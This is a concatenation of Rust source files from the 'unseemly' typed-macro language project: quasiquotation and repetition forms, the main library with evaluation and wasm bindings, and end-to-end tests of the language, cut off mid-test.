We should be invoking `get_res` once per repetition, // and reconstructing a repetition... somehow. for i in 0..repeats { for (name, ty) in ddd_parts_uq.env.iter_pairs() { if drivers.contains(name) { walked_env = walked_env.set(*name, match ty.c() { Node(ref form, ref parts, _) if form.name == n("tuple") => { let component = parts.get_rep_leaf_or_panic(n("component"))[i].clone(); let ddd2_form = crate::core_forms::find("Type", "dotdotdot_type"); if let Some(ddd2_parts) = component.destructure(ddd2_form) { // HACK! If the tuple had a ddd, we should just unwrap it. // We should somehow eliminate this linkage between // syntax repetition and tuples with type repetition. ddd2_parts.get_leaf_or_panic(&n("body")).clone() } else { component } } Node(ref form, ref parts, _) if form.name == n("dotdotdot") => { parts.get_leaf_or_panic(&n("body")).clone() } _ => ty_err!(UnableToDestructure(ty.clone(), n("tuple")) at ty), }); } else { walked_env = walked_env.set(*name, ty.clone()); } } } ddd_parts_uq.with_environment(walked_env).quote_more(None).get_res(n("body")) } }; } // TODO #38: This should take a grammar, not an NT, as an argument, // and be located underneath each Plus or Star. pub fn dotdotdot_form(nt: Name) -> Rc<Form> { Rc::new(Form { name: n("dotdotdot"), grammar: Rc::new(form_pat!((delim "...[", "[", [(star [(call "DefaultSeparator"), (scan_cat "(,)", "keyword.operator"), (named "driver", (-- 1 varref)), (call "DefaultSeparator"), (scan_cat "(,)", "keyword.operator")]), (lit ">>"), (named "body", (call_by_name nt))]))), type_compare: Positive(NotWalked), // this is not a type form synth_type: Both( cust_rc_box!(|ddd_parts| { ddd_type__body!(ddd_parts) }), cust_rc_box!(|ddd_parts| { ddd_type__body!(ddd_parts) }), ), // An evaluate-time version of this might be a good idea; // it might be all that's needed to implement variable-number-of-argument functions. // It shouldn't be the same form, though. Maybe `...( >> )...` ? eval: Positive(NotWalked), quasiquote: Positive(cust_rc_box!(|ddd_parts| { use crate::{ runtime::eval::{Sequence, Value}, walk_mode::WalkElt, }; let (_, ddd_parts_uq) = ddd_parts.quote_less(); let drivers: Vec<Name> = ddd_parts_uq .get_rep_term(n("driver")) .into_iter() .map(|a| match a.c() { QuoteLess(ref d, _) => d.vr_to_name(), _ => icp!(), }) .collect(); // TODO: the typechecker should reject dotdotdotds with no drivers, // or where a driver isn't in scope. let count = match *ddd_parts_uq.env.find_or_panic(&drivers[0]) { Sequence(ref contents) => contents.len(), ref other => icp!("type error: {} isn't a sequence", other), }; let mut reps: Vec<Ast> = vec![]; for i in 0..count { let mut walked_env = Assoc::new(); for (n, val) in ddd_parts_uq.env.iter_pairs() { let walked_val = if drivers.contains(n) { match *val { Sequence(ref contents) => (*contents[i]).clone(), _ => icp!("type error"), } } else { val.clone() }; walked_env = walked_env.set(*n, walked_val); } ddd_parts_uq.clear_memo(); reps.push( ddd_parts_uq .with_environment(walked_env) .quote_more(None) .get_res(n("body"))? .to_ast(), ); } // HACK: this tells `walk_quasi_literally` to splice (TODO #40?) Ok(Value::from_ast(&raw_ast!(Shape(reps)))) })), }) } // How do we walk quasiquotations? // During type synthesis, we are checking the internal structure of the quoted syntax, // and we walk it just like we walk normal AST; just with a shifted environment. // This is why we sometimes need type annotations. // During evaluation, quoted terms are inactive. // Everything (except `unquote` and `dotdotdot`!) is LiteralLike. // Furthermore, the direction of the walk is determined by the direction of the original quotation. pub fn quote(pos: bool) -> Rc<Form> { use crate::{earley::ParseContext, grammar::FormPat::*}; let perform_quotation = move |pc: ParseContext, starter_info: Ast| -> ParseContext { let starter_nt = match starter_info.c() { IncompleteNode(ref parts) => parts.get_leaf_or_panic(&n("nt")).vr_to_name(), _ => icp!("malformed quotation"), }; fn already_has_unquote(fp: &FormPat) -> bool { match *fp { Alt(ref parts) => parts.iter().any(|sub_fp| already_has_unquote(&*sub_fp)), Biased(ref plan_a, ref plan_b) => { already_has_unquote(&*plan_a) || already_has_unquote(&*plan_b) } Scope(ref f, _) => f.name == n("unquote"), _ => false, } } let pos_inside = nt_is_positive(starter_nt); // TODO: Editing forms is really sketchy! // Maybe we should go back to having a special (gensymmed) NT // or some other way to signal to the parser to treat repetitions differently. let new_grammar = pc .grammar .keyed_map_borrow_f(&mut |nt: &Name, nt_def: &Rc<FormPat>| { if already_has_unquote(nt_def) // HACK: this is to avoid hitting "starterer". TODO: find a better way || (nt != &n("Expr") && nt != &n("Pat") && nt != &n("Type") && nt != &n("AtomNotInPat")) { nt_def.clone() } else { let nt_for_type = if nt == &n("AtomNotInPat") { n("Atom") } else { *nt }; // TODO #38: we should insert `dotdotdot` under Star and Plus, // not at the top level Rc::new(Biased( unquote(nt_for_type, pos), Rc::new(Biased(dotdotdot(*nt), nt_def.clone())), )) } }) .set( n("QuotationBody"), Rc::new(form_pat!( // HACK: The `nt` from outside isn't in the same Scope, it seems: [(named "nt", (anyways (vr starter_nt))), (alt [], [(call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)")]), (lit "|"), (named "body", (++ pos_inside (call_by_name starter_nt)))])), ); pc.with_grammar(new_grammar) }; // TODO #4: the following hardcodes positive walks as `Expr` and negative walks as `Pat`. // What happens when more NTs are added? Rc::new(Form { name: if pos { n("quote_expr") } else { n("quote_pat") }, grammar: Rc::new(form_pat!((delim "'[", "[", // TODO: use `extend`, not `extend_nt`. Can it resolve the HACK above? [(extend_nt (named "nt", varref), "QuotationBody", perform_quotation)]))), type_compare: Both(NotWalked, NotWalked), // Not a type synth_type: if pos { Positive(cust_rc_box!(|quote_parts| { if nt_is_positive(quote_parts.get_term(n("nt")).vr_to_name()) { // TODO #9: if the user provides an annotation, check it! Ok(ast!({"Type" "type_apply" : "type_rator" => (, nt_to_type(quote_parts.get_term(n("nt")).vr_to_name()) ), "arg" => [(, remove_opacity(&quote_parts.get_res(n("body"))?, -1) )] })) } else { if !quote_parts.has(n("ty_annot")) { ty_err!(AnnotationRequired (()) at quote_parts.this_ast); } let expected_type = &quote_parts.get_res(n("ty_annot"))?; // We're looking at things 1 level deeper: let prot_expected_type = adjust_opacity(expected_type, quote_parts.env.clone(), 1); // TODO: do we need this result environment somewhere? // Note that `Pat<Point>` (as opposed to `Pat <:[x: Real, y: Real>:`) // is what we want! // In other words, syntax types don't care about positive vs. negative! // There's a longer argument in the form of code to this effect elsewhere, // but it boils down to this: environments can always be managed directly, // by introducing and referencing bindings. let _ = &quote_parts.with_context(prot_expected_type).get_res(n("body")); Ok(ast!({"Type" "type_apply" : "type_rator" => (, nt_to_type(quote_parts.get_term(n("nt")).vr_to_name()) ), "arg" => [ (,expected_type.clone()) ]})) } })) } else { Negative(cust_rc_box!(|quote_parts| { // There's no need for a type annotation let nt = quote_parts.get_term(n("nt")).vr_to_name(); if nt_is_positive(nt) { // TODO #9: check that this matches the type annotation, if provided! quote_parts.get_res(n("body")) } else { let new_context = less_quoted_ty(quote_parts.context_elt(), Some(nt), &quote_parts.this_ast)?; // TODO #9: check that this matches the type annotation, if provided! quote_parts.with_context(new_context).get_res(n("body")) } })) }, eval: if pos { Positive(cust_rc_box!(|quote_parts| { let mq_parts = quote_parts.switch_mode::<QQuote>().quote_more(None); match mq_parts.get_term_ref(n("body")).c() { // Strip the `QuoteMore`: QuoteMore(a, _) => crate::ast_walk::walk::<QQuote>(&*a, &mq_parts), _ => icp!(), } })) } else { Negative(cust_rc_box!(|quote_parts| { let context = quote_parts.context_elt().clone(); let mq_parts = quote_parts.switch_mode::<QQuoteDestr>().quote_more(None).with_context(context); match mq_parts.get_term_ref(n("body")).c() { // Strip the `QuoteMore`: QuoteMore(body, _) => crate::ast_walk::walk::<QQuoteDestr>(&*body, &mq_parts), _ => icp!(), } })) }, quasiquote: Both(LiteralLike, LiteralLike), }) } #[test] fn quote_unquote_eval_basic() { use crate::{ast_walk::LazyWalkReses, runtime::eval::Value}; let pos = true; let neg = false; let env = assoc_n!( "n" => val!(i 5), "en" => val!(ast (vr "qn")) ); let qenv = assoc_n!( "qn" => val!(i 6) ); fn eval_two_phased( expr: &Ast, env: Assoc<Name, Value>, qenv: Assoc<Name, Value>, ) -> Result<Value, ()> { crate::ast_walk::walk::<Eval>(expr, &LazyWalkReses::new_mq_wrapper(env, vec![qenv])) } fn destr_two_phased( pat: &Ast, env: Assoc<Name, Value>, qenv: Assoc<Name, Value>, ctxt: Value, ) -> Result<Assoc<Name, Value>, ()> { crate::ast_walk::walk::<Destructure>( pat, &LazyWalkReses::new_mq_wrapper(env, vec![qenv]).with_context(ctxt), ) } assert_eq!( eval_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true (vr "qn"))}), env.clone(), qenv.clone() ), Ok(val!(ast (vr "qn"))) ); assert_eq!( eval_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {unquote_form(n("Expr"), true, 1) ; "nt" => (vr "Expr"), "body" => (-- 1 (vr "en"))})}), env.clone(), qenv.clone() ), Ok(val!(ast (vr "qn"))) ); assert_eq!( destr_two_phased( &ast!({quote(neg) ; "nt" => (vr "Expr"), "body" => (++ false (vr "qn"))}), env.clone(), qenv.clone(), val!(ast (vr "qn")) ), Ok(Assoc::<Name, Value>::new()) ); // '[Expr | match qn { x => qn }]' assert_m!( eval_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {"Expr" "match" : "scrutinee" => (vr "qn"), "p" => [@"c" "x"], "arm" => [@"c" (import ["p" = "scrutinee"] (vr "qn"))]})}), env.clone(), qenv.clone() ), Ok(_) ); } #[test] fn quote_type_basic() { let pos = true; let neg = false; let env = assoc_n!( "n" => ast!({"Type" "Nat" :}) ); let qenv = assoc_n!( "qn" => ast!({"Type" "Nat" :}) ); let expr_type = crate::core_type_forms::get__primitive_type(n("Expr")); let pat_type = crate::core_type_forms::get__primitive_type(n("Pat")); fn synth_type_two_phased( expr: &Ast, env: Assoc<Name, Ast>, qenv: Assoc<Name, Ast>, ) -> crate::ty::TypeResult { crate::ast_walk::walk::<crate::ty::SynthTy>( expr, &crate::ast_walk::LazyWalkReses::new_mq_wrapper(env, vec![qenv]), ) } // '[Expr | qn]' assert_eq!( synth_type_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true (vr "qn"))}), env.clone(), qenv.clone() ), Ok(ast!({"Type" "type_apply" : "type_rator" => (,expr_type.clone()), "arg" => [{"Type" "Nat" :}]})) ); // '[Expr | match qn { x => qn }]' assert_eq!( synth_type_two_phased( &ast!({quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {"Expr" "match" : "scrutinee" => (vr "qn"), "p" => [@"c" "x"], "arm" => [@"c" (import ["p" = "scrutinee"] (vr "qn"))]})}), env.clone(), qenv.clone() ), Ok(ast!({"Type" "type_apply" : "type_rator" => (,expr_type.clone()), "arg" => [{"Type" "Nat" :}]})) ); // previously unaccessed environments default to the core values/types // '[Expr | '[Expr | five]']' assert_eq!( crate::ty::synth_type( // By default, `synth_type` uses the same env in all phases. &ast!( {quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true {quote(pos) ; "nt" => (vr "Expr"), "body" => (++ true (vr "five"))})}), assoc_n!("five" => uty!({Int :})) ), Ok(ast!({"Type" "type_apply" : "type_rator" => (,expr_type.clone()), "arg" => [{"Type" "type_apply" :
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/main.rs
src/main.rs
// Unseemly is a "core" typed language with (typed!) macros. // You shouldn't write code in Unseemly. // Instead, you should implement your programming language as Unseemly macros. #![allow(dead_code, unused_macros, non_snake_case, non_upper_case_globals, deprecated)] // dead_code and unused_macros are hopefully temporary allowances // non_snake_case is stylistic, so we can write `non__snake_case`. // non_upper_case_globals is stylistic ... but maybe thread_locals really ought to be upper case. // deprecated is temporary, until `Sky` replaces `EnvMBE` (and the deprecated calls are cleaned up) #![recursion_limit = "128"] // Yikes. // for testing; requires `cargo +nightly` // #![feature(log_syntax, trace_macros)] // trace_macros!(true); // TODO: turn these into `use` statements in the appropriate places #[macro_use] extern crate custom_derive; pub mod macros; pub mod name; // should maybe be moved to `util`; `mbe` needs it pub mod util; pub mod alpha; pub mod ast; pub mod beta; pub mod read; pub mod earley; pub mod grammar; pub mod unparse; pub mod form; pub mod ast_walk; pub mod expand; pub mod subtype; pub mod ty; pub mod ty_compare; pub mod walk_mode; pub mod runtime; pub mod core_extra_forms; pub mod core_forms; pub mod core_macro_forms; pub mod core_qq_forms; pub mod core_type_forms; pub mod highlighter_generation; mod end_to_end__tests; use crate::{ ast::Ast, name::Name, runtime::eval::{eval, Value}, util::assoc::Assoc, }; use wasm_bindgen::prelude::*; /// Everything you need to turn text into behavior. #[derive(Clone)] pub struct Language { pub pc: crate::earley::ParseContext, // TODO: how do these differ from the corresponding elements of `ParseContext`? // Should we get rid of `Language` in favor of it??? pub type_env: Assoc<Name, Ast>, pub type_env__phaseless: Assoc<Name, Ast>, pub value_env: Assoc<Name, Value>, } /// Generate Unseemly. /// (This is the core language.) pub fn unseemly() -> Language { Language { pc: crate::core_forms::outermost__parse_context(), type_env: crate::runtime::core_values::core_types(), type_env__phaseless: crate::runtime::core_values::core_types(), value_env: crate::runtime::core_values::core_values(), } } /// Run the file (which hopefully evaluates to `capture_language`), and get the language it defines. /// Returns the parse context, the type environment, the phaseless version of the type environment, /// and the value environment. /// This doesn't take a language 4-tuple -- it assumes that the language is in Unseemly /// (but of course it may do `include /[some_language.unseemly]/` itself). /// TODO: we only need the phaselessness for macros, and maybe we can get rid of it there? pub fn language_from_file(path: &std::path::Path) -> Language { let mut raw_lib = String::new(); use std::io::Read; let orig_dir = std::env::current_dir().unwrap(); std::fs::File::open(path) .expect("Error opening file") .read_to_string(&mut raw_lib) .expect("Error reading file"); // Evaluate the file in its own directory: if let Some(dir) = path.parent() { // Might be empty: if dir.is_dir() { std::env::set_current_dir(dir).unwrap(); } } let lang = get_language(&raw_lib, unseemly()); // Go back to the original directory: std::env::set_current_dir(orig_dir).unwrap(); return lang; } pub fn get_language(program: &str, lang: Language) -> Language { // TODO: I guess syntax extensions ought to return `Result`, too... let lib_ast = crate::grammar::parse(&core_forms::outermost_form(), lang.pc, &program).unwrap(); let lib_typed = ast_walk::walk::<ty::SynthTy>( &lib_ast, &ast_walk::LazyWalkReses::new(lang.type_env, lang.type_env__phaseless, lib_ast.clone()), ) .unwrap(); let lib_expanded = crate::expand::expand(&lib_ast).unwrap(); let lib_evaled = crate::runtime::eval::eval(&lib_expanded, lang.value_env).unwrap(); let (new_pc, new__value_env) = if let Value::Sequence(mut lang_and_env) = lib_evaled { let env_value = lang_and_env.pop().unwrap(); let lang_value = lang_and_env.pop().unwrap(); let new_pc = match &*lang_value { Value::ParseContext(boxed_pc) => (**boxed_pc).clone(), _ => icp!("[type error] not a language"), }; let new__value_env = if let Value::Struct(ref env) = *env_value { let mut new__value_env = Assoc::new(); // We need to un-freshen the names that we're importing // so they can actually be referred to. for (k, v) in env.iter_pairs() { new__value_env = new__value_env.set(k.unhygienic_orig(), v.clone()) } new__value_env } else { icp!("[type error] Unexpected lib syntax structure: {:#?}", env_value) }; (new_pc, new__value_env) } else { icp!("[type error] Unexpected lib syntax strucutre: {:#?}", lib_evaled); }; node_let!(lib_typed => {Type tuple} lang_and_types *= component); node_let!(lang_and_types[1] => {Type struct} keys *= component_name, values *= component); let mut new__type_env = Assoc::<Name, Ast>::new(); for (k, v) in keys.into_iter().zip(values.into_iter()) { // As above, unfreshen: new__type_env = new__type_env.set(k.to_name().unhygienic_orig(), v.clone()); } // Do it again, to unpack the phaseless type environment: node_let!(lang_and_types[2] => {Type struct} pl_keys *= component_name, pl_values *= component); let mut new___type_env__phaseless = Assoc::<Name, Ast>::new(); for (k, v) in pl_keys.into_iter().zip(pl_values.into_iter()) { // As above, unfreshen: new___type_env__phaseless = new___type_env__phaseless.set(k.to_name().unhygienic_orig(), v.clone()); } Language { pc: new_pc, type_env: new__type_env, type_env__phaseless: new___type_env__phaseless, value_env: new__value_env, } } /// Evaluate a program written in some language. pub fn eval_program(program: &str, lang: Language) -> Result<Value, String> { // TODO: looks like `outermost_form` ought to be a property of `ParseContext` let ast: Ast = crate::grammar::parse(&core_forms::outermost_form(), lang.pc, program) .map_err(|e| e.msg)?; let _type = ast_walk::walk::<ty::SynthTy>( &ast, &ast_walk::LazyWalkReses::new(lang.type_env, lang.type_env__phaseless, ast.clone()), ) .map_err(|e| format!("{}", e))?; let core_ast = crate::expand::expand(&ast).map_err(|_| "???".to_string())?; eval(&core_ast, lang.value_env).map_err(|_| "???".to_string()) } /// Evaluate a program written in Unseemly. /// Of course, it may immediately do `include /[something]/` to switch languages. pub fn eval_unseemly_program_top(program: &str) -> Result<Value, String> { eval_program(program, unseemly()) } /// Type program written in Unseemly. /// Of course, it may immediately do `include /[something]/` to switch languages. pub fn type_unseemly_program_top(program: &str) -> Result<Ast, String> { let unseemly = unseemly(); let ast: Ast = crate::grammar::parse(&core_forms::outermost_form(), unseemly.pc, program) .map_err(|e| e.msg)?; ast_walk::walk::<ty::SynthTy>( &ast, &ast_walk::LazyWalkReses::new(unseemly.type_env, unseemly.type_env__phaseless, ast.clone()), ) .map_err(|e| format!("{}", e)) } /// Displays `res` on a color terminal. pub fn terminal_display(res: Result<Value, String>) { match res { Ok(v) => println!("\x1b[1;32m≉\x1b[0m {}", v), Err(s) => println!("\x1b[1;31m✘\x1b[0m {}", s), } } fn html_render(res: Result<Value, String>) -> String { match res { Ok(v) => format!("<b>{}</b>", v), // HACK: codespan_reporting uses terminal escapes Err(s) => format!("<pre>{}</pre>", ansi_to_html::convert_escaped(&s).unwrap()), } } use std::iter::FromIterator; thread_local! { static language_stash: std::cell::RefCell<std::collections::HashMap<String, Language>> = std::cell::RefCell::new(std::collections::HashMap::from_iter( vec![("unseemly".to_string(), unseemly())].into_iter())); } #[wasm_bindgen] pub fn html__eval_program(program: &str, stashed_lang: &str) -> String { let lang: Language = language_stash.with(|ls| (*ls.borrow()).get(stashed_lang).unwrap().clone()); html_render(eval_program(program, lang)) } /// Evaluate `program` in `lang_of_program`, and stash the resulting language in `result_name`. /// "unseemly" starts out in the stash, so it's possible to start from somewhere. #[wasm_bindgen] pub fn stash_lang(result_name: &str, program: &str, lang_of_progam: &str) { let orig_lang = language_stash.with(|ls| (*ls.borrow()).get(lang_of_progam).unwrap().clone()); let new_lang = get_language(program, orig_lang); language_stash.with(|ls| ls.borrow_mut().insert(result_name.to_string(), new_lang)); } #[wasm_bindgen] pub fn generate__ace_rules(stashed_lang: &str) -> String { let rules = language_stash.with(|ls| { highlighter_generation::ace_rules(&(*ls.borrow()).get(stashed_lang).unwrap().pc.grammar) }); format!( "start: [ {} // HACK: comments aren't part of the base language: {{ token: 'comment', regex: '#[^\\\\n|][^\\\\n]*|#\\\\|.*?\\\\|#' }}]", rules ) } #[wasm_bindgen] pub fn generate__ace_rules__for(program: &str, stashed_lang: &str) -> String { let lang = language_stash .with(|ls| (*ls.borrow()).get(stashed_lang).expect("Language not defined").clone()); highlighter_generation::dynamic__ace_rules(program, &lang) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/end_to_end__tests.rs
src/end_to_end__tests.rs
use crate::{ ast::Ast, core_forms, eval_unseemly_program_top, expand, grammar, name::{n, Name}, runtime::{core_values, eval, eval::Value}, ty, type_unseemly_program_top, util::assoc::Assoc, }; use std::cell::RefCell; // HACK: the non-test code in here is copied from `cli.rs`. thread_local! { pub static ty_env : RefCell<Assoc<Name, Ast>> = RefCell::new(core_values::core_types()); pub static val_env : RefCell<Assoc<Name, Value>> = RefCell::new(core_values::core_values()); } fn type_unseemly_program(program: &str) -> Result<Ast, String> { let ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; ty_env.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))) } fn eval_unseemly_program(program: &str) -> Result<Value, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let _type = ty_env .with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e)))?; let core_ast = expand::expand(&ast).map_err(|_| "error".to_owned())?; val_env.with(|vals| eval::eval(&core_ast, vals.borrow().clone()).map_err(|_| "???".to_string())) } fn assign_variable(name: &str, expr: &str) -> Result<Value, String> { let res = eval_unseemly_program(expr); if let Ok(ref v) = res { let ty = type_unseemly_program(expr).unwrap(); ty_env.with(|tys| { val_env.with(|vals| { let new_tys = tys.borrow().set(n(name), ty); let new_vals = vals.borrow().set(n(name), v.clone()); *tys.borrow_mut() = new_tys; *vals.borrow_mut() = new_vals; }) }) } res } fn assign_t_var(name: &str, t: &str) -> Result<Ast, String> { let ast = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t, ) .map_err(|e| e.msg)?; let res = ty_env.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))); if let Ok(ref t) = res { ty_env.with(|tys| { let new_tys = tys.borrow().set(n(name), t.clone()); *tys.borrow_mut() = new_tys; }) } res } fn ignore__this_function() { // Suppress unused variable warnings for functions only used in tests. let _ = eval_unseemly_program_top; let _ = type_unseemly_program_top; } // Many of these tests should be converted to `u!`-based tests. // In a lot of cases, the fact htat `u!` doesn't support syntax quotation is an obstacle. // TODO: cut the knot and bake syntax {,un}quotation support to `u!`. #[test] fn end_to_end_int_list_tools() { assert_m!(assign_t_var("IntList", "mu_type IntList . { +[Nil]+ +[Cons Int IntList]+ }"), Ok(_)); assert_m!(assign_t_var("IntListUF", "{ +[Nil]+ +[Cons Int IntList]+ }"), Ok(_)); assert_m!( assign_variable("mt_ilist", "fold +[Nil]+ : { +[Nil]+ +[Cons Int IntList]+ } : IntList"), Ok(_) ); assert_m!( assign_variable("ilist_3", "fold +[Cons three mt_ilist]+ : IntListUF : IntList"), Ok(_) ); assert_m!( assign_variable("ilist_23", "fold +[Cons two ilist_3]+ : IntListUF : IntList"), Ok(_) ); assert_m!( assign_variable("ilist_123", "fold +[Cons one ilist_23]+ : IntListUF : IntList"), Ok(_) ); assert_m!( assign_variable( "sum_int_list", "(fix .[again : [-> [IntList -> Int]] . .[ lst : IntList . match unfold lst { +[Nil]+ => zero +[Cons hd tl]+ => (plus hd ((again) tl))} ]. ]. )" ), Ok(_) ); assert_eq!(eval_unseemly_program("(sum_int_list ilist_123)"), Ok(val!(i 6))); assert_m!( assign_variable( "int_list_len", "(fix .[again : [-> [IntList -> Int]] . .[ lst : IntList . match unfold lst { +[Nil]+ => zero +[Cons hd tl]+ => (plus one ((again) tl))} ]. ].)" ), Ok(_) ); assert_eq!(eval_unseemly_program("(int_list_len ilist_123)"), Ok(val!(i 3))); } #[test] fn end_to_end_list_tools() { assert_m!( assign_t_var("List", "forall T . mu_type List . { +[Nil]+ +[Cons T List<T> ]+ }"), Ok(_) ); assert_m!(assign_t_var("ListUF", "forall T . { +[Nil]+ +[Cons T List<T> ]+ }"), Ok(_)); assert_m!( assign_variable( "mt_list", "fold +[Nil]+ : { +[Nil]+ +[Cons Int List<Int> ]+ } : List < Int > " ), Ok(_) ); assert_m!( assign_variable("list_3", "fold +[Cons three mt_list]+ : ListUF<Int> : List<Int>"), Ok(_) ); assert_m!( assign_variable("list_23", "fold +[Cons two list_3]+ : ListUF<Int> : List<Int>"), Ok(_) ); assert_m!( assign_variable("list_123", "fold +[Cons one list_23]+ : ListUF<Int> : List<Int>"), Ok(_) ); assert_m!( assign_variable( "list_len", "forall S . (fix .[again : [-> [List<S> -> Int]] . .[ lst : List<S> . match unfold lst { +[Nil]+ => zero +[Cons hd tl]+ => (plus one ((again) tl))} ]. ].)" ), Ok(_) ); assert_eq!(eval_unseemly_program("(list_len list_123)"), Ok(val!(i 3))); assert_m!( assign_variable( "map", "forall T S . (fix .[again : [-> [List<T> [T -> S] -> List<S> ]] . .[ lst : List<T> f : [T -> S] . match unfold lst { +[Nil]+ => fold +[Nil]+ : ListUF<S> : List<S> +[Cons hd tl]+ => fold +[Cons (f hd) ((again) tl f)]+ : ListUF<S> : List<S> } ]. ].)" ), Ok(_) ); // TODO: what should even happen if you have `forall` not on the "outside"? // It should probably be an error to have a value typed with an underdetermined type. // TODO: it's way too much of a pain to define each different expected result list. assert_m!(eval_unseemly_program("(map list_123 .[x : Int . (plus x one)]. )"), Ok(_)); assert_m!(eval_unseemly_program("(map list_123 .[x : Int . (equal? x two)]. )"), Ok(_)); } #[test] fn subtyping_direction() { // Let's check to make sure that "supertype" and "subtype" never got mixed up: assert_m!(assign_variable("ident", "forall T . .[ a : T . a ]."), Ok(_)); assert_eq!(eval_unseemly_program("(ident five)"), Ok(val!(i 5))); assert_m!(eval_unseemly_program("( .[ a : [Int -> Int] . a]. ident)"), Ok(_)); assert_m!(eval_unseemly_program("( .[ a : forall T . [T -> T] . a]. .[a : Int . a].)"), Err(_)); assert_m!(eval_unseemly_program(".[ a : *[]* . a]."), Ok(_)); assert_m!( eval_unseemly_program("( .[ a : *[normal : Int extra : Int]* . a]. *[normal : one]*)"), Err(_) ); assert_m!( eval_unseemly_program("( .[ a : *[normal : Int]* . a]. *[normal : one extra : five]*)"), Ok(_) ); } #[test] fn end_to_end_quotation_advanced() { assert_eq!( eval_unseemly_program( "(.[five_e : Expr < Int >. '[Expr | (plus five ,[five_e],) ]' ]. '[Expr | five]')" ), eval_unseemly_program("'[Expr | (plus five five) ]'") ); // Pass the wrong type (not really a test of quotation) assert_m!( type_unseemly_program_top( "(.[five_e : Expr<Int> . '[Expr | (plus five ,[five_e],) ]' ]. '[Expr | true]')" ), Err(_) ); // Interpolate the wrong type assert_m!( type_unseemly_program_top( "(.[five_e : Expr<Bool> . '[Expr | (plus five ,[five_e],) ]' ]. '[Expr | true]')" ), Err(_) ); // Interpolate the wrong type (no application needed to find the error) assert_m!( type_unseemly_program_top(".[five_e : Expr<Bool> . '[Expr | (plus five ,[five_e],) ]' ]."), Err(_) ); assert_m!( eval_unseemly_program( "forall T . .[type : Type<T> rhs : Expr<T> . '[Expr | (.[x : ,[Type<T> | type], . eight]. ,[rhs], )]' ]." ), Ok(_) ); assert_m!(eval_unseemly_program("'[Pat<Nat> | x]'"), Ok(_)); // Actually import a pattern of quoted syntax: assert_eq!( eval_unseemly_program( "match '[Expr | (plus one two) ]' { '[Expr<Int> | (plus ,[Expr<Int> | e], two) ]' => e }" ), eval_unseemly_program("'[Expr| one]'") ); // Thanks to `prefab_type`, we can do implicitly-typed `let` // expanding to explicitly-typed lambda! // See `trad_let.unseemly` for details. assert_m!( assign_variable( "let", "forall T S . .[binder : Pat<T> type : Type<T> rhs : Expr<T> body : Expr<S> . '[ Expr | (.[x : ,[type], . match x { ,[Pat<T> | binder], => ,[body], } ]. ,[rhs],)]' ]." ), Ok(_) ); without_freshening! { assert_eq!( eval_unseemly_program( "(let '[Pat<Int> | y]' '[Type<Int> | Int]' '[Expr<Int> | eight]' '[Expr<Int> | five]')"), eval_unseemly_program("'[Expr<Int> | (.[x : Int . match x {y => five}]. eight)]'")); } // // We need tuple literals before we can test this: // assert_m!(assign_variable("let-multi", // "forall T . .[ binder : **[ :::[T >> Ident<T> ]::: ]** // type : **[ :::[T >> Type<T> ]::: ]** // rhs : **[ :::[T >> Expr<T> ]::: ]** // body : Expr<S> . // '[Expr | (.[ ...[, binder , >> ,[Ident | binder],]... // : ...[, type , >> ,[Type | type], ]... . // ,[body], ]. // ...[, Expr , | ,[rhs], ]... ) ]' // "), // Ok(_)); // without_freshening! { // assert_eq!( // eval_unseemly_program( // "(let-multi '[Ident<Int> | y]' // '[Type<Int> | Int]' // '[Expr<Int> | eight]' // '[Expr<Int> | five]')"), // eval_unseemly_program("'[Expr<Int> | (.[x : Int . match x {y => five}]. eight)]'")); // } } #[test] fn simple_end_to_end_eval() { assert_eq!(eval_unseemly_program_top("(zero? zero)"), Ok(val!(b true))); assert_eq!(eval_unseemly_program_top("(plus one one)"), Ok(val!(i 2))); assert_eq!( eval_unseemly_program_top("(.[x : Int y : Int . (plus x y)]. one one)"), Ok(val!(i 2)) ); assert_eq!( eval_unseemly_program_top( "((fix .[ again : [ -> [ Int -> Int ]] . .[ n : Int . match (zero? n) { +[True]+ => one +[False]+ => (times n ((again) (minus n one))) } ]. ].) five)" ), Ok(val!(i 120)) ); } #[test] fn end_to_end_quotation_basic() { assert_m!(eval_unseemly_program_top("'[Expr | .[ x : Int . x ]. ]'"), Ok(_)); assert_m!(eval_unseemly_program_top("'[Expr | (plus five five) ]'"), Ok(_)); assert_m!(eval_unseemly_program_top("'[Expr | '[Expr | (plus five five) ]' ]'"), Ok(_)); //≫ .[s : Expr<Int> . '[Expr | ( ,[Expr | s], '[Expr | ,[Expr | s], ]')]' ]. } #[test] fn language_building() { assert_eq!( eval_unseemly_program_top( r"extend_syntax DefaultSeparator ::= /((?:\s|#[^\n]*)*)/ ; in # Now we have comments! (just not after the last token) five" ), Ok(val!(i 5)) ); let bound_wrong_prog = "extend_syntax Expr ::=also forall T S . '{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' value := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr<T> }, <-- ...[pat = value]... ) ] }' let_macro -> .{ '[Expr | match ...[,value, >> ,[value], ]... { ...[,pat, >> ,[pat],]... 